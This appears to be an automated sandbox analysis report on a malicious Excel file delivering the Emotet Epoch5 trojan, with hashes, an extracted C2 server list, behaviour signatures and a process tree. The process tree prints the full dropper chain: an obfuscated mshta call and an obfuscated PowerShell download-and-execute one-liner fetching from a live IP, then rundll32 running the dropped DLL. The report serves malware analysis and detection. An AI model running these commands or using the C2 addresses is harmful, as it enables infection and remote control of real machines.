Analysis

  • max time kernel
    126s
  • max time network
    163s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 03:23

General

  • Target

    tmp5qh4u3zw.xls

  • Size

    35KB

  • MD5

    0d6fda87842d373f7851b252a94ebb13

  • SHA1

    0000b8eac81e3dfb157d048c85908466b8e782dc

  • SHA256

    01c5650903200517df3a45801acd6712838f99e1157bcd4c4b5c7278a14ff997

  • SHA512

    b43f376e41b452bfd067e406e5404c04645cb6808d8d89d70b61e332526be4c326de07e4bddcbf21a69670e324c052ee3d1fec04294a15f612d3058c9c5c61f8

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://91.240.118.168/oo/aa/se.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://91.240.118.168/oo/aa/se.png

Extracted

Family

emotet

Botnet

Epoch5

C2

159.69.43.124:8080

45.79.80.198:443

207.148.81.119:8080

128.199.192.135:8080

118.98.72.86:443

217.182.143.207:443

168.197.250.14:80

116.124.128.206:8080

78.46.73.125:443

185.148.168.15:8080

195.154.146.35:443

85.214.67.203:8080

194.9.172.107:8080

59.148.253.194:443

210.57.209.142:8080

54.38.242.185:443

195.77.239.39:8080

159.69.237.188:443

104.131.62.48:8080

62.171.178.147:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • suricata: ET MALWARE W32/Emotet CnC Beacon 3

    suricata: ET MALWARE W32/Emotet CnC Beacon 3

  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Loads dropped DLL 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 19 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 13 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\tmp5qh4u3zw.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2748
    • C:\Windows\SYSTEM32\CMD.EXE
      CMD.EXE /c ms^hta http://91.2^40.118.1^68/oo/aa/s^e.ht^m^l
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3576
      • C:\Windows\system32\mshta.exe
        mshta http://91.240.118.168/oo/aa/se.html
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of WriteProcessMemory
        PID:1272
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({HgfRrtGdf}{HgfRrtGdf}Ne{HgfRrtGdf}{HgfRrtGdf}w{HgfRrtGdf}-Obj{HgfRrtGdf}ec{HgfRrtGdf}{HgfRrtGdf}t N{HgfRrtGdf}{HgfRrtGdf}et{HgfRrtGdf}.W{HgfRrtGdf}{HgfRrtGdf}e'.replace('{HgfRrtGdf}', ''); $c4='bC{HgfRrtGdf}li{HgfRrtGdf}{HgfRrtGdf}en{HgfRrtGdf}{HgfRrtGdf}t).D{HgfRrtGdf}{HgfRrtGdf}ow{HgfRrtGdf}{HgfRrtGdf}nl{HgfRrtGdf}{HgfRrtGdf}{HgfRrtGdf}o'.replace('{HgfRrtGdf}', ''); $c3='ad{HgfRrtGdf}{HgfRrtGdf}St{HgfRrtGdf}rin{HgfRrtGdf}{HgfRrtGdf}g{HgfRrtGdf}(''ht{HgfRrtGdf}tp{HgfRrtGdf}://91.240.118.168/oo/aa/se.png'')'.replace('{HgfRrtGdf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3512
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:348
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll,AADD
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:904
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:960
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Amejhqnzurstbmzv\fwgsefzrxdp.imd",kGXMh
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:692
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Amejhqnzurstbmzv\fwgsefzrxdp.imd",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Suspicious behavior: EnumeratesProcesses
                    PID:2488
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 1272 -s 1764
          4⤵
          • Program crash
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:364

Network

MITRE ATT&CK Matrix ATT&CK v6

Discovery

System Information Discovery

3
T1082

Query Registry

2
T1012

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\QWER.dll
    MD5

    1fd4499e393eb2bae9ff1d58d4669c06

    SHA1

    dfa462ad52abf4edcc904edc3943e1573905bcbd

    SHA256

    a65662042685f530da46a94c8dc4b33248e682de80804764516957738d6381aa

    SHA512

    8a9aab40441cc91cbf5b70d69456d41ef2420f98c22ef7842edbf3088f62468f0b3fcb9ab4bd784c33ef908725e3db4e15a02814507f7a9b5c0e1c289dc94663

  • \ProgramData\QWER.dll
    MD5

    1fd4499e393eb2bae9ff1d58d4669c06

    SHA1

    dfa462ad52abf4edcc904edc3943e1573905bcbd

    SHA256

    a65662042685f530da46a94c8dc4b33248e682de80804764516957738d6381aa

    SHA512

    8a9aab40441cc91cbf5b70d69456d41ef2420f98c22ef7842edbf3088f62468f0b3fcb9ab4bd784c33ef908725e3db4e15a02814507f7a9b5c0e1c289dc94663

  • \ProgramData\QWER.dll
    MD5

    1fd4499e393eb2bae9ff1d58d4669c06

    SHA1

    dfa462ad52abf4edcc904edc3943e1573905bcbd

    SHA256

    a65662042685f530da46a94c8dc4b33248e682de80804764516957738d6381aa

    SHA512

    8a9aab40441cc91cbf5b70d69456d41ef2420f98c22ef7842edbf3088f62468f0b3fcb9ab4bd784c33ef908725e3db4e15a02814507f7a9b5c0e1c289dc94663

  • memory/692-634-0x0000000004E80000-0x0000000004EA7000-memory.dmp
    Filesize

    156KB

  • memory/904-617-0x0000000004080000-0x00000000040A7000-memory.dmp
    Filesize

    156KB

  • memory/960-629-0x0000000004F70000-0x0000000004F97000-memory.dmp
    Filesize

    156KB

  • memory/960-620-0x0000000004660000-0x0000000004687000-memory.dmp
    Filesize

    156KB

  • memory/960-633-0x0000000005170000-0x0000000005197000-memory.dmp
    Filesize

    156KB

  • memory/960-631-0x0000000004FD0000-0x0000000004FF7000-memory.dmp
    Filesize

    156KB

  • memory/960-627-0x0000000004F10000-0x0000000004F37000-memory.dmp
    Filesize

    156KB

  • memory/960-625-0x0000000004DB0000-0x0000000004DD7000-memory.dmp
    Filesize

    156KB

  • memory/960-623-0x0000000004CD0000-0x0000000004CF7000-memory.dmp
    Filesize

    156KB

  • memory/2748-118-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp
    Filesize

    64KB

  • memory/2748-886-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp
    Filesize

    64KB

  • memory/2748-124-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp
    Filesize

    64KB

  • memory/2748-121-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp
    Filesize

    64KB

  • memory/2748-120-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp
    Filesize

    64KB

  • memory/2748-889-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp
    Filesize

    64KB

  • memory/2748-888-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp
    Filesize

    64KB

  • memory/2748-887-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp
    Filesize

    64KB

  • memory/2748-131-0x00007FF9D3640000-0x00007FF9D3650000-memory.dmp
    Filesize

    64KB

  • memory/2748-132-0x00007FF9D3640000-0x00007FF9D3650000-memory.dmp
    Filesize

    64KB

  • memory/2748-119-0x00007FF9D70A0000-0x00007FF9D70B0000-memory.dmp
    Filesize

    64KB

  • memory/3512-322-0x000001B96EF80000-0x000001B96EFB0000-memory.dmp
    Filesize

    192KB

  • memory/3512-295-0x000001B970D00000-0x000001B970D22000-memory.dmp
    Filesize

    136KB

  • memory/3512-323-0x000001B96EF80000-0x000001B96EFB0000-memory.dmp
    Filesize

    192KB

  • memory/3512-365-0x000001B970E80000-0x000001B970EBC000-memory.dmp
    Filesize

    240KB

  • memory/3512-423-0x000001B971380000-0x000001B9713F6000-memory.dmp
    Filesize

    472KB

  • memory/3512-524-0x000001B96EF80000-0x000001B96EFB0000-memory.dmp
    Filesize

    192KB